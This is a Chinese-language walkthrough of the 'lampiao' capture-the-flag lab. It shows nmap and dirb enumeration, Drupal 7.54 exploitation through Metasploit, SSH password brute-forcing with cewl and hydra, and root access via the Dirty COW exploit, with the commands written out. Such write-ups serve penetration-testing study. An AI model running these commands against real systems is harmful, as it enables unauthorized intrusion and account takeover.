lampiao

端口扫描

nmap -sS -sV -T5 -p- 192.168.221.150 --version-all

看到目标只开放22,80,1898端口

打开80端口只看到一张图片和两行字，源码也是如此，没有任何其他信息

因为ssh服务也不知道密码，所以我们把目标放在1898端口上

这是一个拿破仑？

不管了，随便点击redeme就会出现可控参数

改成2试试

~~oh出现了两个文件依次访问试试

audio.m4a

听出来声音可知道用户名：tiago

qrc.png

是一个二维码图片，扫了提示：“Try harder! muahuahua” 提示需要爆破

现在页面已经没什么可挖掘的了。。尝试下一步

目录扫描

dirb http://192.168.221.150:1898

访问发现都没什么实质性的进展

直到翻到robots.txt时。。。

居然翻出了如此多的文件，当拼接CHANGELOG.txt的时候发现这其实是一个Drupal 7.54的版本

漏洞利用

第一种方法：msf搜索drupal版本

search drupal

我们使用

use 1 并 show options

成功获取meterpreter

进入shell，并建立交互式终端

python -c 'import pty;pty.spawn("/bin/bash")'

第二种方法：ssh爆破

1.获取密码字典：cewl（爬取网站关键词并构建字典）

cewl http://192.168.221.150:1898/?q=node/1 -w cewl.txt

2.hydra爆破

hydra -l tiago -P cewl.txt 192.168.221.150 ssh

成功得到密码：Virgulino

3.ssh登录

ssh [email protected]

获取到的权限和第一种方法都差不多，接下去就得

提权

查看内核版本

uname -a

发现版本是2016年的，经搜索发现存在

脏牛提权漏洞

searchsploit dirty

下载到当前目录

searchsploit -m 40847

开启临时http服务便于传输脚本到靶机

python -m http.server 8080

脚本编译

g++ -Wall -pedantic -O2 -std=c++11 -pthread -o exp 40847.cpp -lutil

•  -Wall 一般使用该选项，允许发出GCC能够提供的所有有用的警告
•  -pedantic 允许发出ANSI/ISO C标准所列出的所有警告
•  -O2编译器的优化选项的4个级别，-O0表示没有优化,-O1为缺省值，-O3优化级别最高
•  -std=c++11就是用按C++2011标准来编译的
•  -pthread 在Linux中要用到多线程时，需要链接pthread库
•  -o dcow gcc生成的目标文件,名字为dcow

执行脚本获取到密码

ssh登录root

The end:获取flag